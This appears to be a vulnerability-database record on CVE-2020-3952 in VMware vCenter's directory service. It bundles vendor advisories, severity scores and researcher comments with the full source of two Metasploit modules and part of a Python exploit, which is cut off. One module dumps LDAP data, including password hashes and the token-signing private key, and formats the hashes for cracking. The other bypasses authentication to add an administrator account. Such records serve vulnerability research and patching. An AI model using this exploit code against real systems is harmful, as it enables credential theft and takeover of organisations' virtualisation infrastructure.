This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server 6.7 prior to the 6.7U3f update. Only instances that were upgraded from a previous release line (such as 6.0 or 6.5) are affected; clean installations of 6.7 are not. The dump includes userPassword hashes and the vmwSTSPrivateKey attribute (the Security Token Service private key), and the module treats a non-empty vmwSTSPrivateKey in the results as its indicator that the target is vulnerable. If the bind username and password are provided (BIND_DN and BIND_PW options), these credentials are used instead of attempting an anonymous bind; in that case the dump is authenticated and a successful result does not by itself demonstrate CVE-2020-3952.
{"id": "MSF:AUXILIARY-GATHER-VMWARE_VCENTER_VMDIR_LDAP-", "vendorId": null, "type": "metasploit", "bulletinFamily": "exploit", "title": "VMware vCenter Server vmdir Information Disclosure", "description": "This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5. If the bind username and password are provided (BIND_DN and BIND_PW options), these credentials will be used instead of attempting an anonymous bind.\n", "published": "2020-04-22T22:38:12", "modified": "2022-01-12T15:51:40", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap/", "reporter": "Hynek Petrak, wvu <wvu@metasploit.com>", "references": [], "cvelist": ["CVE-2020-3952"], "immutableFields": [], "lastseen": "2022-06-24T08:40:37", "viewCount": 8, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:605E9AABF85A309DCC2B08791CD8A47B", "0DAYDB:86305C86483A99E3E27347A2CBC3B02C", "0DAYDB:A820E9CE5C7A2E010E37B1EC1DAFD043"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:84DFD86F1486CB7C353A93F819261FA2"]}, {"type": "attackerkb", "idList": ["AKB:85036BC9-E798-46CE-A5B3-43BDCFE83346"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1024"]}, {"type": "cve", "idList": ["CVE-2020-3952"]}, {"type": "exploitdb", "idList": ["EDB-ID:48535"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-LDAP-VMWARE_VCENTER_VMDIR_AUTH_BYPASS-"]}, {"type": "nessus", "idList": ["VMWARE_VCENTER_VMSA-2020-0006.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157896"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953"]}, {"type": "threatpost", "idList": ["THREATPOST:D3B948D7FFB688A6022FF02F81F830F7"]}, {"type": "vmware", "idList": 
["VMSA-2020-0006", "VMSA-2020-0006.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-34499"]}]}, "vulnersScore": 0.2}, "_state": {"score": 1660009287, "dependencies": 1660004461}, "_internal": {"score_hash": "140197fd7935b7576e13be50503bb8f1"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/hashes/identify'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server vmdir Information Disclosure',\n 'Description' => %q{\n This module uses an anonymous-bind LDAP connection to dump data from\n the vmdir service in VMware vCenter Server version 6.7 prior to the\n 6.7U3f update, only if upgraded from a previous release line, such as\n 6.0 or 6.5.\n If the bind username and password are provided (BIND_DN and BIND_PW\n options), these credentials will be used instead of attempting an\n anonymous bind.\n },\n 'Author' => [\n 'Hynek Petrak', # Discovery, hash dumping\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-3952'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html']\n ],\n 'DisclosureDate' => '2020-04-09', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', { 'Description' => 'Dump all LDAP data' }]\n ],\n 'DefaultAction' => 'Dump',\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS],\n 'Reliability' => []\n }\n )\n )\n\n register_options([\n Opt::RPORT(636), # SSL/TLS\n OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it'])\n ])\n end\n\n def base_dn\n @base_dn ||= 'dc=vsphere,dc=local'\n end\n\n def 
policy_dn\n \"cn=password and lockout policy,#{base_dn}\"\n end\n\n # PoC using ldapsearch(1):\n #\n # Retrieve root DSE with base DN:\n # ldapsearch -xb \"\" -s base -H ldap://[redacted]\n #\n # Dump data using discovered base DN:\n # ldapsearch -xb dc=vsphere,dc=local -H ldap://[redacted] \\* + -\n def run\n entries = nil\n\n ldap_connect do |ldap|\n if (@base_dn = datastore['BASE_DN'])\n print_status(\"User-specified base DN: #{base_dn}\")\n else\n print_status('Discovering base DN automatically')\n\n unless (@base_dn = discover_base_dn(ldap))\n print_warning('Falling back on default base DN dc=vsphere,dc=local')\n end\n end\n\n print_status(\"Dumping LDAP data from vmdir service at #{peer}\")\n\n # A \"-\" meta-attribute will dump userPassword (hat tip Hynek)\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/ldap-head/result.c#L647-L654\n entries = ldap.search(base: base_dn, attributes: %w[* + -])\n end\n\n # Look for an entry with a non-empty vmwSTSPrivateKey attribute\n unless entries&.find { |entry| entry[:vmwstsprivatekey].any? 
}\n print_error(\"#{peer} is NOT vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n print_error('Dump failed')\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"#{peer} is vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n pillage(entries)\n\n # HACK: Stash discovered base DN in CheckCode reason\n Exploit::CheckCode::Vulnerable(base_dn)\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n Exploit::CheckCode::Unknown\n end\n\n def pillage(entries)\n # TODO: Make this more efficient?\n ldif = entries.map(&:to_ldif).map { |s| s.force_encoding('utf-8') }.join(\"\\n\")\n\n print_status('Storing LDAP data in loot')\n\n ldif_filename = store_loot(\n name, # ltype\n 'text/plain', # ctype\n rhost, # host\n ldif, # data\n nil, # filename\n \"Base DN: #{base_dn}\" # info\n )\n\n unless ldif_filename\n print_error('Could not store LDAP data in loot')\n return\n end\n\n print_good(\"Saved LDAP data to #{ldif_filename}\")\n\n if (policy = entries.find { |entry| entry.dn == policy_dn })\n print_status('Password and lockout policy:')\n print_line(policy.to_ldif[/^vmwpassword.*/m])\n end\n\n # Process entries with a non-empty userPassword attribute\n process_hashes(entries.select { |entry| entry[:userpassword].any? 
})\n end\n\n def process_hashes(entries)\n if entries.empty?\n print_status('No password hashes found')\n return\n end\n\n service_details = {\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'vmdir/ldap'\n }\n\n entries.each do |entry|\n # This is the \"username\"\n dn = entry.dn\n\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/middle-layer/password.c#L32-L76\n type, hash, salt = entry[:userpassword].first.unpack('CH128H32')\n\n case type\n when 1\n unless hash.length == 128\n vprint_error(\"Type #{type} hash length is not 128 digits (#{dn})\")\n next\n end\n\n unless salt.length == 32\n vprint_error(\"Type #{type} salt length is not 32 digits (#{dn})\")\n next\n end\n\n # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197\n john_hash = \"$dynamic_82$#{hash}$HEX$#{salt}\"\n else\n vprint_error(\"Hash type #{type.inspect} is not supported yet (#{dn})\")\n next\n end\n\n print_good(\"Credentials found: #{dn}:#{john_hash}\")\n\n create_credential(service_details.merge(\n username: dn,\n private_data: john_hash,\n private_type: :nonreplayable_hash,\n jtr_format: identify_hash(john_hash)\n ))\n end\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"metasploit": [{"lastseen": "2022-06-24T08:40:34", "description": "This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, only if upgraded from a previous release line, such as 6.0 or 6.5. Note that it is also possible to provide a bind username and password to authenticate if the target is not vulnerable. It will add an arbitrary administrator user the same way.\n", "cvss3": {}, "published": "2020-04-22T22:38:11", "type": "metasploit", "title": "VMware vCenter Server vmdir Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-12T15:51:40", "id": "MSF:AUXILIARY-ADMIN-LDAP-VMWARE_VCENTER_VMDIR_AUTH_BYPASS-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server vmdir Authentication Bypass',\n 'Description' => %q{\n This module bypasses LDAP authentication in VMware vCenter Server's\n vmdir service to add an arbitrary administrator user. Version 6.7\n prior to the 6.7U3f update is vulnerable, only if upgraded from a\n previous release line, such as 6.0 or 6.5.\n Note that it is also possible to provide a bind username and password\n to authenticate if the target is not vulnerable. 
It will add an\n arbitrary administrator user the same way.\n },\n 'Author' => [\n 'Hynek Petrak', # Discovery\n 'JJ Lehmann', # Analysis and PoC\n 'Ofri Ziv', # Analysis and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-3952'],\n ['URL', 'https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html'],\n ['URL', 'https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md']\n ],\n 'DisclosureDate' => '2020-04-09', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Add', { 'Description' => 'Add an admin user' }]\n ],\n 'DefaultAction' => 'Add',\n 'DefaultOptions' => {\n 'SSL' => true,\n 'CheckModule' => 'auxiliary/gather/vmware_vcenter_vmdir_ldap'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS],\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],\n 'Reliability' => []\n }\n )\n )\n\n register_options([\n Opt::RPORT(636), # SSL/TLS\n OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),\n OptString.new('USERNAME', [false, 'Username of admin user to add']),\n OptString.new('PASSWORD', [false, 'Password of admin user to add'])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def base_dn\n @base_dn ||= 'dc=vsphere,dc=local'\n end\n\n def user_dn\n \"cn=#{username},cn=Users,#{base_dn}\"\n end\n\n def group_dn\n \"cn=Administrators,cn=Builtin,#{base_dn}\"\n end\n\n def run\n unless username && password\n print_error('Please set the USERNAME and PASSWORD options to proceed')\n return\n end\n\n # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap\n checkcode = check\n\n return unless checkcode == Exploit::CheckCode::Vulnerable\n\n if (@base_dn = datastore['BASE_DN'])\n print_status(\"User-specified base DN: #{base_dn}\")\n else\n # HACK: We stashed the detected base DN in the CheckCode's reason\n @base_dn = checkcode.reason\n 
end\n\n ldap_connect do |ldap|\n print_status(\"Bypassing LDAP auth in vmdir service at #{peer}\")\n auth_bypass(ldap)\n\n print_status(\"Adding admin user #{username} with password #{password}\")\n\n unless add_admin(ldap)\n print_error(\"Failed to add admin user #{username}\")\n end\n end\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n end\n\n # This will always return false, since the creds are invalid\n def auth_bypass(ldap)\n # when datastore['BIND_DN'] has been provided in options,\n # ldap_connect has already made a bind for us.\n return if datastore['BIND_DN']\n\n ldap.bind(\n method: :simple,\n username: Rex::Text.rand_text_alphanumeric(8..42),\n password: Rex::Text.rand_text_alphanumeric(8..42)\n )\n end\n\n def add_admin(ldap)\n user_info = {\n 'objectClass' => %w[top person organizationalPerson user],\n 'cn' => username,\n 'sn' => 'vsphere.local',\n 'givenName' => username,\n 'sAMAccountName' => username,\n 'userPrincipalName' => \"#{username}@VSPHERE.LOCAL\",\n 'uid' => username,\n 'userPassword' => password\n }\n\n # Add our new user\n unless ldap.add(dn: user_dn, attributes: user_info)\n res = ldap.get_operation_result\n\n case res.code\n when Net::LDAP::ResultCodeInsufficientAccessRights\n print_error('Failed to bypass LDAP auth in vmdir service')\n when Net::LDAP::ResultCodeEntryAlreadyExists\n print_error(\"User #{username} already exists\")\n when Net::LDAP::ResultCodeConstraintViolation\n print_error(\"Password #{password} does not meet policy requirements\")\n else\n print_error(\"#{res.message}: #{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username}, so auth bypass was successful!\")\n\n # Add our user to the admin group\n unless ldap.add_attribute(group_dn, 'member', user_dn)\n res = ldap.get_operation_result\n\n if res.code == Net::LDAP::ResultCodeAttributeOrValueExists\n print_error(\"User #{username} is already an admin\")\n else\n print_error(\"#{res.message}: 
#{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username} to admin group\")\n\n true\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2022-07-15T19:58:18", "description": "", "cvss3": {}, "published": "2020-04-15T18:47:00", "type": "akamaiblog", "title": "What's a 10? Pwning vCenter with CVE-2020-3952", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-15T18:47:00", "id": "AKAMAIBLOG:84DFD86F1486CB7C353A93F819261FA2", "href": "https://www.akamai.com/blog/security/pwning-vmware-vcenter-cve-2020-3952", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2020-04-11T22:42:33", "description": "##### 1\\. Impacted Products\n\n * VMware vCenter Server\n\n##### 2\\. Introduction\n\n###### A sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) was privately reported to VMware. vCenter updates are available to address this vulnerability. \n\n\n###### \n\n##### 3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\n\n**Description: \n**\n\nUnder certain conditions[1] vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. VMware has evaluated the severity of this issue to be in the [Critical severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [10.0](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H>). 
\n\n\n**Known Attack Vectors:**\n\nA malicious actor with network access to an affected vmdir deployment may be able to extract highly sensitive information which could be used to compromise vCenter Server or other services which are dependent upon vmdir for authentication. \n\n\n**Resolution:**\n\nTo remediate CVE-2020-3952 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds:**\n\nNone.\n\n**Additional Documentation:**\n\nVMware has created [KB78543](<https://kb.vmware.com/s/article/78543>) which details steps to determine whether or not a particular deployment is affected by CVE-2020-3952. \n\n\n**Acknowledgements:**\n\nNone.\n\n**Notes:**\n\n[1] vCenter Server 6.7 (embedded or external PSC) prior to 6.7u3f is affected by CVE-2020-3952 if it was upgraded from a previous release line such as 6.0 or 6.5. Clean installations of vCenter Server 6.7 (embedded or external PSC) are not affected.\n\n**Response Matrix:**\n\n(The matrix table was not captured in this extract; per note [1] above, the fixed version for 6.7 is 6.7u3f.)\n", "cvss3": {}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-09T00:00:00", "id": "VMSA-2020-0006", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-26T00:56:18", "description": "3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\nUnder certain conditions[1] vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. 
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 10.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-16T00:00:00", "id": "VMSA-2020-0006.1", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.1.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:19", "description": "An authentication bypass vulnerability exists in VMware VCenter Server Directory Service. 
Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-26T00:00:00", "type": "checkpoint_advisories", "title": "VMware VCenter Server Directory Service Authentication Bypass (CVE-2020-3952)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-10-26T00:00:00", "id": "CPAI-2020-1024", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-06-14T23:28:08", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 16, 2020 1:25pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. 
I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**busterb** at April 15, 2020 4:15pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**cnotin** at April 16, 2020 2:20pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. 
I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**hrbrmstr** at April 18, 2020 11:49am UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. 
:)\n\nHats off to the Guardicore team for their dedicated analysis.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-3952 - VMware vCenter Server vmdir Information Disclosure", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-08-28T00:00:00", "id": "AKB:85036BC9-E798-46CE-A5B3-43BDCFE83346", "href": "https://attackerkb.com/topics/f5Gs82lZKq/cve-2020-3952---vmware-vcenter-server-vmdir-information-disclosure", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-19T21:59:12", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-06-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 6.7 - Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-06-01T00:00:00", "id": "1337DAY-ID-34499", "href": "https://0day.today/exploit/description/34499", 
"sourceData": "# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html\r\n# Version: vCenter Server 6.7 before update 3f\r\n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)\r\n# CVE: CVE-2020-3952\r\n\r\n#!/usr/bin/env python3\r\n\r\n'''\r\n\tCopyright 2020 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\r\n \r\n Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952\r\n \r\n File name CVE-2020-3592.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n \r\n ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n\r\n Features: exploit + vulnerability checker\r\n'''\r\n\r\nimport binascii, socket, sys, string, random\r\n\r\n## Default vars; change at will\r\n_sIP = '192.168.50.35'\r\n_iPORT = 389\r\n_iTIMEOUT = 5\r\n\r\ndef randomString(iStringLength=8):\r\n #sLetters = string.ascii_lowercase\r\n sLetters = string.ascii_letters\r\n return ''.join(random.choice(sLetters) for i in range(iStringLength))\r\n\r\ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified\r\n ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed\r\n sReturn = sPrefix\r\n if (len(sData) / 2 ) > 255:\r\n sReturn += b'82'\r\n hexBytes = 2\r\n elif (len(sData) /2 ) >= 128:\r\n sReturn += b'81'\r\n sReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode()\r\n return sReturn\r\n\r\ndef buildBindRequestPacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sPass, b'80') + sPass\r\n sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket\r\n sPacket = b'020103' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'60') + sPacket\r\n sPacket = b'020101' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket) \r\n\r\ndef buildUserCreatePacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n def 
createAttribute(sName, sValue):\r\n sValue = getLengthPrefix(sValue, b'04') + sValue\r\n sName = getLengthPrefix(sName, b'04') + sName\r\n \r\n sReturn = getLengthPrefix(sValue, b'31') + sValue\r\n sReturn = sName + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n def createObjectClass():\r\n sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')\r\n \r\n sReturn = getLengthPrefix(sReturn, b'31') + sReturn\r\n sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n ## Attributes\r\n sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))\r\n sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))\r\n sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)\r\n sAttributes += 